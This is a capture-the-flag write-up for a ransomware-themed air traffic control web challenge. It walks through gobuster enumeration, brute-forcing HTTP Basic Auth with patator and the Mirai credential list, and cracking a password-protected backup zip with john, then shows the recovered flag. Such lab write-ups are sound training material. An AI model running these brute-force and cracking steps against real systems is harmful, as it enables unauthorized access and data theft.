ATC (Smart Airspace, 200p)

A teller at the airport informs you that they are currently under a ransomware attack and therefore it is not possible to complete your check-in.
You offer to help and start looking for anything useful.
While visiting the air traffic control tower, you see a ransom message appear on the radar screens.
Seems that the radars somehow still work.
Maybe not everything has been encrypted yet.
Investigate if you can still recover some unencrypted files from the system.
ATC Radar (http://envXXX.target03:8080/)

solution

Website is showing ransomware warning and "openScope Air Traffic Control Simulator" changing every minute.

screenshot of website screenshot of website

Webpage is non-interactive and base64 message in ransomware warning is a dead-end.

Trying to run gobuster hits against too many 401 error's (unauthorized). Also, verifying manually, everything tested returns error 401.

Error: the server returns a status code that matches the provided options for non existing urls. http://envXXX.target03:8080/3ba89519-f242-4c47-a8c8-df06de445e3d => 401 (Length: 139). To continue please exclude the status code, the length or use the --wildcard switch

Running adjusted gobuster reveals only single directory - /assets.

# gobuster dir -u http://envXXX.target03:8080/ -w /usr/share/wordlists/dirb/common.txt -b 401
===============================================================
Gobuster v3.1.0
===============================================================
/assets               (Status: 301) [Size: 179] [--> /assets/]

As this is also a dead-end, brute-force must be used. Trying to brute-force HTTP Basic Authentication password is successful.

# sed -e 's/ /:/' /usr/share/metasploit-framework/data/wordlists/mirai_user_pass.txt > up.txt
patator http_fuzz auth_type=basic url=http://envXXX.target03:8080/test user_pass=FILE0 0=up.txt resolve=envXXX.target02:10.93.XX.Y -x ignore:code=401
15:50:54 patator    INFO - Starting Patator 0.9 (https://github.com/lanjelot/patator)
15:50:54 patator    INFO -
15:50:54 patator    INFO - code size:clen       time | candidate                          |   num | mesg
15:50:54 patator    INFO - -----------------------------------------------------------------------------
15:50:54 patator    INFO - 404  415:143        0.003 | admin:password                     |    13 | HTTP/1.1 404 Not Found
15:50:55 patator    INFO - Hits/Done/Skip/Fail/Size: 1/60/0/0/60, Avg: 100 r/s, Time: 0h 0m 0s

Using valid credentials with gobuster is more informative.

# gobuster dir -u http://envter dir -u http://envXXX.target03:8080/ -w /usr/share/wordlists/dirb/common.txt -U admin -P password
===============================================================
Gobuster v3.1.0
===============================================================
/admin                (Status: 200) [Size: 321]
/Admin                (Status: 200) [Size: 321]
/ADMIN                (Status: 200) [Size: 321]
/archive              (Status: 200) [Size: 321]
/Archive              (Status: 200) [Size: 321]
/assets               (Status: 301) [Size: 179] [--> /assets/]
/backup               (Status: 200) [Size: 240]
/binaries             (Status: 301) [Size: 183] [--> /binaries/]
/board                (Status: 301) [Size: 177] [--> /board/]
/database             (Status: 200) [Size: 321]
/sysadmin             (Status: 301) [Size: 183] [--> /sysadmin/]
/SysAdmin             (Status: 301) [Size: 183] [--> /SysAdmin/]

Only interesting thing is /backup, which returns a .zip archive.

# curl -sLO http://admin:password@envXXX.target03:8080/backup
# file backup
backup: Zip archive data, at least v1.0 to extract, compression method=store

As archive is password-protected, the password also must be brute-forced.

# zip2john backup > backup.hash
ver 1.0 efh 5455 efh 7875 backup/flag.txt PKZIP Encr: 2b chk, TS_chk, cmplen=58, decmplen=46, crc=66A0B540 ts=76C7 cs=76c7 type=0
# john backup.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
987654321        (backup/flag.txt)
1g 0:00:00:00 DONE 2/3 (2022-10-AA BB:CC) 20.00g/s 531360p/s 531360c/s 531360C/s 123456..Peter
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Password is brute-forced successfully and flag extracted.

# unzip backup
Archive:  backup
[backup] flag.txt password: 987654321
 extracting: flag.txt
# cat flag.txt
ctftech{6b0239c5-23da-4301-b391-99ed9a078fa1}

Flag is ctftech{6b0239c5-23da-4301-b391-99ed9a078fa1}.


Buy Me A Coffee